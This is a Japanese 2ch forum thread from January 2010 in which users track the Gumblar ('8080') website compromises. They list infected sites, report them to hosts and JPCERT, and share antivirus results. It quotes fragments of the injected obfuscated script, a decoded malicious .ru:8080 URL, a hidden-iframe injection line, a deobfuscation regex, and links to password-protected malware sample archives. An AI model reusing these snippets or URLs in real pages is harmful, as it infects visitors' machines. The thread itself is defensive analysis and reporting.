0714名無しさん@お腹いっぱい。
2010/01/17(日) 03:27:15インディーズ情報サイト
http://www.music-trip.que.ne●jp/
針灸院
http://yamanashi.harikyu.or●jp/asakawa/
http://www.suzuran7●jp/index.html
http://hikiyamahari●com/
一番下のやつがなんかすこし変わってる。aguseで検出できず
<script>/*LGPL*/ try{ window.onload = function(){E1e6wn3ijzwv9g = 'h$@t##()t(!&@p!@:@/&@/$^&()
0715名無しさん@お腹いっぱい。
2010/01/17(日) 03:28:120716名無しさん@お腹いっぱい。
2010/01/17(日) 03:29:09難読化部分だけうpしますた。
難読化を複号するとこんなアドレス。
ttp://haberturk-com.welt.de.over-blog-com.anycitytown.ru:8080/webmasterworld.com/webmasterworld.com/sendspace.com/me.com/google.com/
0717名無しさん@お腹いっぱい。
2010/01/17(日) 03:30:070719名無しさん@お腹いっぱい。
2010/01/17(日) 03:32:260720699=711
2010/01/17(日) 03:34:060721名無しさん@お腹いっぱい。
2010/01/17(日) 03:34:080722名無しさん@お腹いっぱい。
2010/01/17(日) 03:40:08Java 6 Update 3
Adobe Reader 9.1
で感染するか試してみる
0723名無しさん@お腹いっぱい。
2010/01/17(日) 03:40:520724名無しさん@お腹いっぱい。
2010/01/17(日) 03:42:10>>714 の一番下のと同タイプみたいですね
0725名無しさん@お腹いっぱい。
2010/01/17(日) 03:42:30もちろん
Firebugのコンソールに突っ込んだり・・・
手動でゴリゴリってのも一つの手段w
0726722
2010/01/17(日) 03:51:10bridal-lasik●com さくら
linto●org でじろく
あきたねる
0728名無しさん@お腹いっぱい。
2010/01/17(日) 03:56:56乙でした
0730722
2010/01/17(日) 04:01:12ttp://www.dotup.org/uploda/www.dotup.org568621.png
ttp://www.dotup.org/uploda/www.dotup.org568624.png
0731名無しさん@お腹いっぱい。
2010/01/17(日) 04:01:26>>714
インディーズ情報サイト
www●music-trip●que●ne●jp める
針灸院
yamanashi●harikyu●or●jp/asakawa める
www●suzuran7●jp ジェイナビ
hikiyamahari●com さくら
ろりぽ以外はめるで同時にJPCERT/CCにもつーほー
0733名無しさん@お腹いっぱい。
2010/01/17(日) 11:59:48おまえら魔族か?
0734名無しさん@お腹いっぱい。
2010/01/17(日) 12:00:45γ⌒ヽ
< ・、,,,;;,)
< つ=つ
ノ ノ三)
∠、 m)=m)
ガンプラー
(2009 〜 )
0735名無しさん@お腹いっぱい。
2010/01/17(日) 12:03:09>>495-507
0736名無しさん@お腹いっぱい。
2010/01/17(日) 12:18:24のホーページに異変あり?
0737名無しさん@お腹いっぱい。
2010/01/17(日) 12:40:23w
0738名無しさん@お腹いっぱい。
2010/01/17(日) 12:50:27ぐぐったら二つアドレスがあってどっちもぁぅぁぅぁー
0739名無しさん@お腹いっぱい。
2010/01/17(日) 12:53:05>>714 下の亜種スクリプトか・・・
0740名無しさん@お腹いっぱい。
2010/01/17(日) 13:04:29anycitytown.ru
easylifedirect.ru
追加で
めるした。
ついでに検体も送付先いぱーい
http://www.virustotal.com/analisis/2849dbd2bc8006042aaca6dd3efdc5db68f34e62004a2100062a6f28db8f8ffa-1263701087
File index.html received on 2010.01.17 04:04:47 (UTC)
Result: 6/41 (14.63%)
あばばばばば
0742名無しさん@お腹いっぱい。
2010/01/17(日) 14:47:44電凸してみました
OS:ME+ノートン2010だがHPは開けますが?と
&名誉毀損で警察に訴えるそうですw
0743名無しさん@お腹いっぱい。
2010/01/17(日) 14:52:33日曜日だし、ネタだろ?
…ネタだよな?
0744名無しさん@お腹いっぱい。
2010/01/17(日) 14:59:58s://form.jpcert.or.jp/
p://www.google.com/safebrowsing/report_badware/
0745名無しさん@お腹いっぱい。
2010/01/17(日) 15:03:20善意の一般人を犯罪者呼ばわりするなんて
0746名無しさん@お腹いっぱい。
2010/01/17(日) 15:11:210747名無しさん@お腹いっぱい。
2010/01/17(日) 15:13:33> &名誉毀損で警察に訴えるそうですw
ノートン2010ってMEで動くの?
0748名無しさん@お腹いっぱい。
2010/01/17(日) 15:37:05このスレの住人にとっては失笑ものでしょうけど
一般的にはこんなものでしょうw
0749名無しさん@お腹いっぱい。
2010/01/17(日) 15:37:19MGとかめちゃリアルだし、しかも接着剤、塗料不要だからしんなー臭い思いしなくて済む。
昔のはよく股関節折れたりしたな。
0750742
2010/01/17(日) 15:45:26モロゾフの件もここが捜査をしているので勝負したるでw
0751名無しさん@お腹いっぱい。
2010/01/17(日) 15:53:43感染したら、裏でウイルスDLしてくるんでしょ
具体的に、どんな症状がでてくるんでしょうか?
0752名無しさん@お腹いっぱい。
2010/01/17(日) 16:04:10見た目分かりやすいのが偽セキュリティソフトの
「Security Tool」がインストールされることだろう
他にもあるんだろうが裏でこっそりやられてたらわからん
ダウンロードされるウイルスによるだろうな
0753名無しさん@お腹いっぱい。
2010/01/17(日) 16:41:38カスペだと↓こんなん出ました〜
2010/01/17 16:33:31 検出しました: HEUR:Trojan-Downloader.Script.Generic http://www●s-palcall●com/
0754名無しさん@お腹いっぱい。
2010/01/17(日) 16:45:32こんな文面でおk?
http://www●s-palcall●com/
This site is infected with '8080 Virus', accessing to malicious PDF file.
0755名無しさん@お腹いっぱい。
2010/01/17(日) 16:50:35ちょっと解析のやり方教えてくれ
preg_match_all("/'([^']+)'\.replace\(\s*(\/[^\/]+\/i*)g*\s*,\s*'([^']*)'/","文字列",$match);
で難読化コードと置換パターンを取り出してpreg_replaceに突っ込んでる
Firefoxなら
'〜難読化された文字列〜'.replace(/&|#|\$|\(|@|\!|\^|\)/ig , ''); を取り出して
Firebugという拡張で突っ込むだけ
http://www.dotup.org/uploda/www.dotup.org570191.png
0757名無しさん@お腹いっぱい。
2010/01/17(日) 17:21:500758名無しさん@お腹いっぱい。
2010/01/17(日) 17:21:570759名無しさん@お腹いっぱい。
2010/01/17(日) 17:26:53ぜんぜん難読じゃなくね
普通に置換してるだけじゃん
なんどく 0 【難読】
文字の読みがむずかしいこと。また、読みにくいこと
0761名無しさん@お腹いっぱい。
2010/01/17(日) 18:40:36ちょ・・・
昨日、今日JTBのツアー漁ってたんだけど...
改ざん疑いのあるページとかkwsk
0762名無しさん@お腹いっぱい。
2010/01/17(日) 19:19:04バスターはまだ9x系サポートしてんのか、フリーのは9x系もサポート対象だな
もうそろそろソフトも動かなくなってきてるはずだけど
0763名無しさん@お腹いっぱい。
2010/01/17(日) 19:33:210764名無しさん@お腹いっぱい。
2010/01/17(日) 19:37:202006まで2000に対応 2007からXP以前のOSには対応しなくなった。
2005は98などに対応していた。
0765名無しさん@お腹いっぱい。
2010/01/17(日) 19:43:16XP以前じゃなくて2000以前じゃ・・・
まあいいや
いくないのはJTB今日見ちゃったんだが・・・・
0766名無しさん@お腹いっぱい。
2010/01/17(日) 20:02:46有効でも万全の対策が取れていれば感染は免れる
0767名無しさん@お腹いっぱい。
2010/01/17(日) 20:05:35>1見てURL書いてくれ
トップページとか国内旅行とか大丈夫だったけど
0768名無しさん@お腹いっぱい。
2010/01/17(日) 20:08:27ttp://labs-uploader.sabaitiba.com/virus/download/1263726345.7z
PASS:virus
BSODってうああああああああああああああああああ
0769名無しさん@お腹いっぱい。
2010/01/17(日) 20:13:16とはいえ、「JTB」となるとうっかり許可してしまう可能性も・・・。
ホワイトリストをかなり絞って、許可を控えたほうがいいような・・・・・。
0770名無しさん@お腹いっぱい。
2010/01/17(日) 20:25:58FlashやReaderは仕方ないがJAVAは削除して常に最新の状態にしておくしかないだろう
0771名無しさん@お腹いっぱい。
2010/01/17(日) 20:27:130772名無しさん@お腹いっぱい。
2010/01/17(日) 20:28:12特に仕事で使う場合とか
0773名無しさん@お腹いっぱい。
2010/01/17(日) 20:43:430774名無しさん@お腹いっぱい。
2010/01/17(日) 20:54:010775名無しさん@お腹いっぱい。
2010/01/17(日) 20:54:35Javaを使うアプリも少なくないし、要不要は人それぞれ。
0776名無しさん@お腹いっぱい。
2010/01/17(日) 20:58:17Windows自体が要らないみたいな極論になるよな。
0777名無しさん@お腹いっぱい。
2010/01/17(日) 21:04:030778名無しさん@お腹いっぱい。
2010/01/17(日) 21:23:50要は日頃使ってるものにどれだけリスクがあるかを学ぶってことなんだろうけど
0779名無しさん@お腹いっぱい。
2010/01/17(日) 21:29:32たまたま最近見てなかったけど、そろそろ必要になりそうだから、
本当に感染してるなら早く上げてほしい。
(と言いつつ確認しに行けないチキンでスマソ)
火狐+NSだから、未知の脆弱性が出てきたとしても>>185でFA
なんだろうけど。
0780名無しさん@お腹いっぱい。
2010/01/17(日) 21:41:50そういうのってブラウザプラグインは要らないからシステムに影響を与えない形でJREを同梱するだけなのになぁ
0781名無しさん@お腹いっぱい。
2010/01/17(日) 21:46:13ttp://www.virustotal.com/zh-tw/analisis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259371503
安全特警は完全地支持
0782名無しさん@お腹いっぱい。
2010/01/17(日) 21:56:45P2P厨死ね
0783名無しさん@お腹いっぱい。
2010/01/17(日) 22:20:47>>770だと古いの削除しなきゃいけないみたいだけど。
0784名無しさん@お腹いっぱい。
2010/01/17(日) 22:23:140785名無しさん@お腹いっぱい。
2010/01/17(日) 22:27:58ポイントサイト及び日本語リードメールサイトのの広告先の報告は上昇気味
0786名無しさん@お腹いっぱい。
2010/01/17(日) 22:34:051年ぐらい前に最新版でも古いJavaが原因でブラウザがクラッシュする不具合があったな、今は直ってるけど
0787名無しさん@お腹いっぱい。
2010/01/17(日) 22:37:36最初に入れたのがJRE 1.6.0_u10以降のバージョンならその心配はない。
JRE 1.6.0_u10未満のバージョンから上書きアップデートを続けているなら要確認。
詳しくは以下参照。
JRE 1.6.0_u10 でのインストールパスの変更 - 思い立ったら書く日記
ttp://d.hatena.ne.jp/kaito834/20100116/1263623866
0788名無しさん@お腹いっぱい。
2010/01/17(日) 22:40:52ESETで検知。
0789名無しさん@お腹いっぱい。
2010/01/17(日) 22:44:33LGPLタイプ
これはニュースで報道される会社レベルだな
0790名無しさん@お腹いっぱい。
2010/01/17(日) 22:49:19これ、カートがjava script無いと動作しないタイプだから
申し込んだやつは確実にru.8080へ飛ばされてる
0791名無しさん@お腹いっぱい。
2010/01/17(日) 22:57:560792名無しさん@お腹いっぱい。
2010/01/17(日) 22:59:59あると助かる
0793名無しさん@お腹いっぱい。
2010/01/17(日) 23:07:25そんな事で回避できたら苦労しない
0794名無しさん@お腹いっぱい。
2010/01/17(日) 23:20:460795名無しさん@お腹いっぱい。
2010/01/17(日) 23:22:170796名無しさん@お腹いっぱい。
2010/01/17(日) 23:25:580797名無しさん@お腹いっぱい。
2010/01/17(日) 23:57:400798名無しさん@お腹いっぱい。
2010/01/18(月) 00:13:350799名無しさん@お腹いっぱい。
2010/01/18(月) 00:23:25どうすればいいの?
感染の事実と各メーカーからのアンチウイルスをソフトを進めるのがいいの?
それともどうにもならなくなったら最悪広げないために一刻も早くサイトを畳むべき?
0800名無しさん@お腹いっぱい。
2010/01/18(月) 00:36:281.webサーバーを停止する
2.パスワードを変更する
3.ファイルを置き換える
4.お詫びの告知をする
0801名無しさん@お腹いっぱい。
2010/01/18(月) 00:44:470802名無しさん@お腹いっぱい。
2010/01/18(月) 00:48:090803名無しさん@お腹いっぱい。
2010/01/18(月) 00:52:160804名無しさん@お腹いっぱい。
2010/01/18(月) 01:01:33検索して回るのがこわい
0805名無しさん@お腹いっぱい。
2010/01/18(月) 01:14:250806名無しさん@お腹いっぱい。
2010/01/18(月) 01:20:500807名無しさん@お腹いっぱい。
2010/01/18(月) 01:34:20ハイ、粕です。
Cエグゼファイル
提出時刻が20:51
解析終了時刻が21:22
定義リリース時刻が0:59で検出可
検出名 Trojan.Win32.Agent.dfru
ウイルストータルでは現時点ではまだ検出が反映されず。
0808名無しさん@お腹いっぱい。
2010/01/18(月) 02:22:16クリーンでない環境からパスワード変更してもまた盗まれないか?
0809名無しさん@お腹いっぱい。
2010/01/18(月) 02:50:14感染する可能性が高い。
Java 5.0を指定するアプリを使っているなら最新のUpdate 22に、Java 6.0でも問題がないのなら
Update 17以上(最新はUpdate 18)に速やかに更新すべし。
0810名無しさん@お腹いっぱい。
2010/01/18(月) 02:54:21感染したままの環境を使い続けるとかありえないだろ、常識的に考えて
0811名無しさん@お腹いっぱい。
2010/01/18(月) 03:02:31ウイルス除去は大前提で書いたんだすまん
0812名無しさん@お腹いっぱい。
2010/01/18(月) 03:43:26ttp://labs-uploader.sabaitiba.com/virus/download/1263753667.zip
PASS:virus
PDF入れ忘れていたので追加した・・・
NER(´・ω・) ス
0813名無しさん@お腹いっぱい。
2010/01/18(月) 06:57:510814名無しさん@お腹いっぱい。
2010/01/18(月) 08:00:05元は露助かもしれんが、今は国内にイタズラ者がいるような気がする
0815名無しさん@お腹いっぱい。
2010/01/18(月) 08:36:13スキーは稼ぎどきだろうし,一旦閉じる気はないのかも
0816名無しさん@お腹いっぱい。
2010/01/18(月) 09:41:37自公がインターネットを撲滅するためにやってるんだよ
0817名無しさん@お腹いっぱい。
2010/01/18(月) 09:44:56その後の経過VirusTotalアドレスを数本入れてあります。
http://www1.axfc.net/uploader/Sc/so/74280
PASS:今日の鉢
ナツカシス
0818名無しさん@お腹いっぱい。
2010/01/18(月) 09:59:158つですか
どうもで〜す
0819名無しさん@お腹いっぱい。
2010/01/18(月) 10:04:53よっぽど慌てたのかTOPからのリンクは残ってるけど
0820名無しさん@お腹いっぱい。
2010/01/18(月) 10:17:320821名無しさん@お腹いっぱい。
2010/01/18(月) 10:21:100822名無しさん@お腹いっぱい。
2010/01/18(月) 10:25:09Version 6 Update 17が最新じゃないの?
0823名無しさん@お腹いっぱい。
2010/01/18(月) 10:29:530824名無しさん@お腹いっぱい。
2010/01/18(月) 10:38:36AntiVir
Avast
AVG
GData
Kaspersky
McAfee
NOD32
TrendMicro
0825名無しさん@お腹いっぱい。
2010/01/18(月) 10:55:07アップロードしたファイルをローカルでスキャンすればわかりますか?
何年も前に作ったサイトを放置したままなのですが、
どうすればいいのかわかりません。
0826名無しさん@お腹いっぱい。
2010/01/18(月) 11:04:09テルモ報告した人だけど、こういうのって対策ソフトベンダーから連絡入るの?
一応ESETには報告しといたんだけど。(といっても報告画面が出てきたから送信ボタン押しただけ)
それともここの誰かが連絡入れたりしてる?
実はこういうのに遭遇したのはじめてなんだ。
0827名無しさん@お腹いっぱい。
2010/01/18(月) 11:32:44日本語ページが更新されてないだけ
0828名無しさん@お腹いっぱい。
2010/01/18(月) 11:58:16Mcafeeでウイルスがブロックされるのだが
http://www.forest.impress.co.jp/lib/inet/websupt/speedanlz/editmtu.html
この トロイの木馬 について
検出済み: Exploit-ObscuredHtml (トロイの木馬)
場所: C:\Documents and Settings\home\Local Settings\Application Data\Google\Toolbar History\urls\00000002
これって誤検出? プニルだと無反応なのにIE8だと反応する不思議!
0829名無しさん@お腹いっぱい。
2010/01/18(月) 12:53:23これ見るとGoogle Toolbarにある過去のURLに関係ありそうじゃない?
0830名無しさん@お腹いっぱい。
2010/01/18(月) 12:55:46カスペだと↓こんなん出ました。ヒューリスティック検出じゃなくなってます
パルコール嬬恋
2010/01/18 6:17:21 検出しました: Trojan.JS.Agent.bay http://www.s-palcall.com/
2010/01/18 12:45:55 検出しました: Trojan.JS.Agent.bay http://www.palcall.co.jp/
0831名無しさん@お腹いっぱい。
2010/01/18(月) 12:57:50コッソリ直してお詫びも載せず、そ知らぬ顔で営業続けそう
0832名無しさん@お腹いっぱい。
2010/01/18(月) 12:59:36ググルツールバー入れて該当ページに逝くと、ツールバーを
奨める判断の為に履歴チェックが掛かってるだけかと
0833↑ ↑ ↑ ↑
2010/01/18(月) 12:59:58うっかり直リンしてしまいました
危険です踏まないでください
0834名無しさん@お腹いっぱい。
2010/01/18(月) 13:00:55今はこんな感じ
ttp://www.virustotal.com/analisis/4ca4c454cbbbf51466918f69200b6a14c998edd8b71665254ec8f5cf5433a576-1263787080
0835名無しさん@お腹いっぱい。
2010/01/18(月) 13:13:42日本ではメジャーどころのSymantec、TrendMicro、Avast、AVGあたりが
検出しないから、ガセネタと思っているのかも???
0836名無しさん@お腹いっぱい。
2010/01/18(月) 13:30:100837名無しさん@お腹いっぱい。
2010/01/18(月) 13:32:15通販サイトだからやばくないか
0838名無しさん@お腹いっぱい。
2010/01/18(月) 13:38:540839名無しさん@お腹いっぱい。
2010/01/18(月) 13:45:39↓
tp://www.team-e.co.jp/
tp://imlabel.jp/
0840名無しさん@お腹いっぱい。
2010/01/18(月) 13:50:00Gumblar Checker 2にかけたけど
両方ともやられてましたよ
0841名無しさん@お腹いっぱい。
2010/01/18(月) 13:50:39その貼り方じゃ専ブラでリンク化する
0842名無しさん@お腹いっぱい。
2010/01/18(月) 13:53:52ttp://www●re-no●jp/ もやられてた
0843名無しさん@お腹いっぱい。
2010/01/18(月) 13:58:35imlabelは違ってた
ttp://www.virustotal.com/jp/analisis/d2b1c6cdefad8cd0ec7f59f73365507ad027ce9887e340e79bb3ba815fce7fbb-1263790363
もうキリが無いw
0844名無しさん@お腹いっぱい。
2010/01/18(月) 14:06:370845名無しさん@お腹いっぱい。
2010/01/18(月) 14:07:230846名無しさん@お腹いっぱい。
2010/01/18(月) 14:07:530847名無しさん@お腹いっぱい。
2010/01/18(月) 14:10:450848名無しさん@お腹いっぱい。
2010/01/18(月) 14:11:25紛らわしくてすいません
0849名無しさん@お腹いっぱい。
2010/01/18(月) 14:12:20誰か電凸しろよ
0850名無しさん@お腹いっぱい。
2010/01/18(月) 14:14:390851名無しさん@お腹いっぱい。
2010/01/18(月) 14:17:48aguseはカスペ使ってるみたいだし
0852名無しさん@お腹いっぱい。
2010/01/18(月) 14:23:10逆に被害にあうケースのほうが多そうだな ^^;
0853名無しさん@お腹いっぱい。
2010/01/18(月) 14:38:210854名無しさん@お腹いっぱい。
2010/01/18(月) 14:42:38それはお前だけだ
0855名無しさん@お腹いっぱい。
2010/01/18(月) 14:42:500856名無しさん@お腹いっぱい。
2010/01/18(月) 14:43:21カスペだと↓こんなん出ました〜
ヒューリスティック検出です〜
2010/01/18 14:39:57 検出しました: HEUR:Trojan-Downloader.Script.Generic http://imlabel.jp/
0857↑ ↑ ↑ ↑
2010/01/18(月) 14:45:59すみません
0858名無しさん@お腹いっぱい。
2010/01/18(月) 14:46:500859名無しさん@お腹いっぱい。
2010/01/18(月) 14:47:50これ最新だから送付して
http://labs-uploader.sabaitiba.com/virus/download/1263790883.7z
pass: virus
0860名無しさん@お腹いっぱい。
2010/01/18(月) 14:51:21virustotalのカスペのバージョンが7.0.0.125なので、そのへんの違いなのかね
0861名無しさん@お腹いっぱい。
2010/01/18(月) 14:54:43直リンより、名前欄に矢印でレス指定しようとしてることのほうがムカつくw
0862名無しさん@お腹いっぱい。
2010/01/18(月) 15:21:11かかったPCはSymantecEndpointProtectionで検知したものの分析保留のまま、
Acrobat8が起動しフリーズしてしまいました。
すぐに無線親機の電源を切りましたが、ほかに2台パソコンが起動しておりましたのでそれらに広がっていないか不安です。
今現在、かかったPCはネットから切り離しフルスキャン中で、起動していた2台のPCの片方はMicrosoftのSecurityEssentialsで同様にフルスキャン中です。
ただし、フルスキャンを行っている2つのPCは2ヶ月以上セキュリティの更新を行っておりませんでした。
また、もう片方のPCにはセキュリティ対策のソフトウェアが入っていないためスキャンができません。
私、WebとFTPのサーバーも管理しておりそちらのPCはたまたま電源が入っておりませんでしたが、
何かすべき対策はありますでしょうか?ご教授お願いいたします。
0863名無しさん@お腹いっぱい。
2010/01/18(月) 15:24:16因みに
http://akiba-ns●com/
でかかりました
0864名無しさん@お腹いっぱい。
2010/01/18(月) 15:27:57ウイルス対策入ってなくてもスキャンできるようなサイトがあるから、
「オンラインスキャン」でGoogle検索するといろいろあるはず
問題はオンラインスキャンがGumblarの検出に対応してくれているのか・・・
0865名無しさん@お腹いっぱい。
2010/01/18(月) 15:28:55国分:「感染したらこうなるらしいけど、どう思った?」
http://www.smilebanana.com/archives/2010/01/18-0003.php
0866名無しさん@お腹いっぱい。
2010/01/18(月) 15:29:09嬬恋はSymantecを使ってると聞いたことがある。
おそらくSymantecが検出しないといくらこっちが丁寧な対応で報告しても悪戯だと思ってるのかも。
0867名無しさん@お腹いっぱい。
2010/01/18(月) 15:30:41その中に3つあったけど、1つ目はスキー場と同じでメール済
2つ目はimlabelと同じでメール済
3つ目は/*LGPL*/の後の文字列も1つ目2つ目とは違ってて
virustotalでもResult: 1/40 (2.5%)だったので、これだけavast!にメールした
ttp://www.virustotal.com/analisis/6adfe857fb92a67931f32ba4ccb90cdc82c4187d57c35353a7423f567d3bc42d-1263794970
ちなみに3つともru:8080だけどURLは全部違う
0868名無しさん@お腹いっぱい。
2010/01/18(月) 15:31:01わお てんこもりw
0869名無しさん@お腹いっぱい。
2010/01/18(月) 15:32:32そこ凄いね。新旧揃い組?
0870名無しさん@お腹いっぱい。
2010/01/18(月) 15:35:260871名無しさん@お腹いっぱい。
2010/01/18(月) 15:42:280872名無しさん@お腹いっぱい。
2010/01/18(月) 15:42:293つかかってるのか
重症だな
0873名無しさん@お腹いっぱい。
2010/01/18(月) 15:43:190874名無しさん@お腹いっぱい。
2010/01/18(月) 15:44:440875名無しさん@お腹いっぱい。
2010/01/18(月) 15:46:43秋葉原人 | 秋葉原のニュース投稿ポータルサイトだって
0876名無しさん@お腹いっぱい。
2010/01/18(月) 15:49:07WebとFTPのサーバーも管理しており ってw
セキュリティ対策全くと言って良いほどしてねーし
踏んだPC リカバしとけ
0877名無しさん@お腹いっぱい。
2010/01/18(月) 15:51:230878名無しさん@お腹いっぱい。
2010/01/18(月) 15:52:280879名無しさん@お腹いっぱい。
2010/01/18(月) 15:55:51ほー ありがと
無縁だなw
>>877
現状中小企業はそんなもんだな
でも862が管理してるサーバって・・・・
0880名無しさん@お腹いっぱい。
2010/01/18(月) 15:58:32中小企業じゃ専門の業者じゃなく自称パソコンに詳しい社員にろくな報酬無しで押しつけてるみたいだし。
0881名無しさん@お腹いっぱい。
2010/01/18(月) 16:00:15直接さくらインターネットに連絡するしかないのかな
0882名無しさん@お腹いっぱい。
2010/01/18(月) 16:00:20セキュリティ?何それ美味しいの?」
0883名無しさん@お腹いっぱい。
2010/01/18(月) 16:13:22こういうサイトってWPのパスを奪われてテンプレに書き加えられてるのかね?
0884名無しさん@お腹いっぱい。
2010/01/18(月) 16:15:11気がついたらしいけど残骸に/*LGPL*/
0885名無しさん@お腹いっぱい。
2010/01/18(月) 16:16:55とりあえずオンラインスキャンをいくつか試してみようかと思います。
>>865 これとは症状が全く違う症状でした。 急にAcrobatが起動してVistaがフリーズしたので。。。
>>877 >>878 >>879 その通り自称鯖管のようなもので、大学の研究用に使っているだけの大したことない自宅鯖です。
今は使っていなかったので、セーフ?だったわけですが。。。
「現状中小企業はそんなもんだな 」ってマジすか...結構無防備なのですね。
今回はいろいろ勉強になりました。ありがとうございます!!
0886名無しさん@お腹いっぱい。
2010/01/18(月) 16:17:28重くなってただけだった。。。
0887名無しさん@お腹いっぱい。
2010/01/18(月) 16:19:08オマエに無防備言われてもなw
0888名無しさん@お腹いっぱい。
2010/01/18(月) 16:21:050889名無しさん@お腹いっぱい。
2010/01/18(月) 16:26:06http://dailynews.yahoo.co.jp/photograph/pickup/?1263798241
0890名無しさん@お腹いっぱい。
2010/01/18(月) 16:28:43まあ落ち着け
とりあえずキムチで食ってろ
0891名無しさん@お腹いっぱい。
2010/01/18(月) 16:30:01オマエもsageとけ
0892名無しさん@お腹いっぱい。
2010/01/18(月) 16:32:410893名無しさん@お腹いっぱい。
2010/01/18(月) 16:41:21これ見に行ったら歌手の浅川マキさん死去の訃報を見てしまいへこんだ・・
0894名無しさん@お腹いっぱい。
2010/01/18(月) 16:41:47もったいない・・・
0895名無しさん@お腹いっぱい。
2010/01/18(月) 16:49:22WPと言っても結局FTP使って設置する場合が多いんだから同じでしょ
テンプレもindex.phpだから普通に書き換えられるだろうし、大量にあるjsファイルも全部書き換えられる
0896名無しさん@お腹いっぱい。
2010/01/18(月) 17:16:27「CODE1」以外にdocument.write(unescape("〜が仕込まれていて
<IFRAME name="StatPage" src="http://iner●kz/index2.php" width=5 height=5 style="display:none">
になるのだけど新手の改竄?
0897名無しさん@お腹いっぱい。
2010/01/18(月) 17:23:40Avast!が反応したけどそういうことではなくて?
0898名無しさん@お腹いっぱい。
2010/01/18(月) 17:25:310899名無しさん@お腹いっぱい。
2010/01/18(月) 17:27:59Avast!が反応したのが「CODE1〜」だけでなく、「document.write(unescape("〜」にも
反応してるならいいのですが、「CODE1〜」を新しいコードに置き換えようとして失敗
してるのかと思った次第。
0900名無しさん@お腹いっぱい。
2010/01/18(月) 17:32:09Bingのキャッシュ
p://cc.bingj.com/cache.aspx?q=script+code1+try&d=4586565574853043&mkt=ja-JP&setlang=ja-JP&w=415a73d1,318f0160
0901名無しさん@お腹いっぱい。
2010/01/18(月) 17:32:370902名無しさん@お腹いっぱい。
2010/01/18(月) 18:14:410903名無しさん@お腹いっぱい。
2010/01/18(月) 18:17:470904名無しさん@お腹いっぱい。
2010/01/18(月) 18:18:09自分はそのレスで知ったよ……
0905名無しさん@お腹いっぱい。
2010/01/18(月) 18:20:53○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
0906名無しさん@お腹いっぱい。
2010/01/18(月) 18:28:080907名無しさん@お腹いっぱい。
2010/01/18(月) 18:34:31> のファイルを削除すれば復旧しますが
これはいらない
消せば直ると勘違いする
0908名無しさん@お腹いっぱい。
2010/01/18(月) 18:44:04210.189.83.28
http://whois.jp/
f. [組織名] 株式会社キャッチボール・トゥエンティワン・インターネット・コンサルティング
o. [電話番号] 03-3237-1367
電凸
特別なツールで調査中だそうですww
0909名無しさん@お腹いっぱい。
2010/01/18(月) 18:45:19特別なツールってなんだよw
0910名無しさん@お腹いっぱい。
2010/01/18(月) 18:46:050911名無しさん@お腹いっぱい。
2010/01/18(月) 18:46:15只今メンテナンス中につき、ご利用いただけません。
0912名無しさん@お腹いっぱい。
2010/01/18(月) 18:50:14閲覧した人間も感染するってことを知らなくてこのまま何のアナウンスも無くサイト復帰かな
0913名無しさん@お腹いっぱい。
2010/01/18(月) 18:58:16www●re-no●jp/ とか re-no●jp/imbit/ がまだ見られるね
気がついてればいいけど
0914名無しさん@お腹いっぱい。
2010/01/18(月) 18:58:400915名無しさん@お腹いっぱい。
2010/01/18(月) 18:59:490916名無しさん@お腹いっぱい。
2010/01/18(月) 19:00:59ttp://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Epalcall%2Eco%2Ejp%2Fpalcabin%2Findex%2Ehtml
/*LGPL*/
>>912
絶賛放置中にしか見えない。。。
0917名無しさん@お腹いっぱい。
2010/01/18(月) 19:04:38s-palは稼働中なんだなw
0918名無しさん@お腹いっぱい。
2010/01/18(月) 19:07:540919名無しさん@お腹いっぱい。
2010/01/18(月) 19:09:480920名無しさん@お腹いっぱい。
2010/01/18(月) 19:13:010921名無しさん@お腹いっぱい。
2010/01/18(月) 19:16:37見てたかもしれない。。。
http://pc11.2ch.net/test/read.cgi/sec/1261855221/823+834-835
0922名無しさん@お腹いっぱい。
2010/01/18(月) 19:28:530923名無しさん@お腹いっぱい。
2010/01/18(月) 19:34:46どうした?
0924名無しさん@お腹いっぱい。
2010/01/18(月) 19:43:470925名無しさん@お腹いっぱい。
2010/01/18(月) 20:12:040926名無しさん@お腹いっぱい。
2010/01/18(月) 20:13:290927名無しさん@お腹いっぱい。
2010/01/18(月) 20:14:290928926
2010/01/18(月) 20:14:580929名無しさん@お腹いっぱい。
2010/01/18(月) 20:17:480930名無しさん@お腹いっぱい。
2010/01/18(月) 20:29:32ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1435481549
回答者と同じ気持ちだ
0931名無しさん@お腹いっぱい。
2010/01/18(月) 20:31:160932名無しさん@お腹いっぱい。
2010/01/18(月) 20:49:12*.ru* これはどうかな?
まったく意味がないかも知れんがw
0933名無しさん@お腹いっぱい。
2010/01/18(月) 20:51:530934名無しさん@お腹いっぱい。
2010/01/18(月) 20:52:480935名無しさん@お腹いっぱい。
2010/01/18(月) 21:02:57http://i.yimg.jp/images/ks/official/nt/ch48_grd01.gif
0936名無しさん@お腹いっぱい。
2010/01/18(月) 21:10:25やっぱり感染した場合はリカバリが良いよね。
0937名無しさん@お腹いっぱい。
2010/01/18(月) 21:11:06どっかでみたことあるような
って
ワロタ
マルチはだめって言えよww
0938名無しさん@お腹いっぱい。
2010/01/18(月) 21:17:39FTPの設定を盗むのかな?
保存しないで、IDとパスワードを手打ちにすれば大丈夫ですか?
0939名無しさん@お腹いっぱい。
2010/01/18(月) 21:21:34たぶん新手の改竄だと思われ
0940名無しさん@お腹いっぱい。
2010/01/18(月) 21:38:05ttp://www.terumo.co.jp/press/2010/notice.html
0941名無しさん@お腹いっぱい。
2010/01/18(月) 21:41:56感心した
0942名無しさん@お腹いっぱい。
2010/01/18(月) 21:54:09ポート監視してるんじゃね?FTPは生のIDとパスを流すから
0943名無しさん@お腹いっぱい。
2010/01/18(月) 21:58:10個人的にはそれに加えて、FTPソフトがhtmlファイルを開く動作にフックかけてそうな気がする。
0944名無しさん@お腹いっぱい。
2010/01/18(月) 22:04:34設定も盗むし同一ネットワーク内の通信も見てる
0945名無しさん@お腹いっぱい。
2010/01/18(月) 22:22:16久しぶりに最新版にしようと、IE8でアドビ行ってリーダー9.3
0946945
2010/01/18(月) 22:23:42リーダー9.3をダウンロードしたところで「攻撃的なアドオンを
認めたのでIEが閉じました」とブロックされてしまった。
3回やって同じ。なんで?アドビ今大丈夫?
0947名無しさん@お腹いっぱい。
2010/01/18(月) 22:24:030948名無しさん@お腹いっぱい。
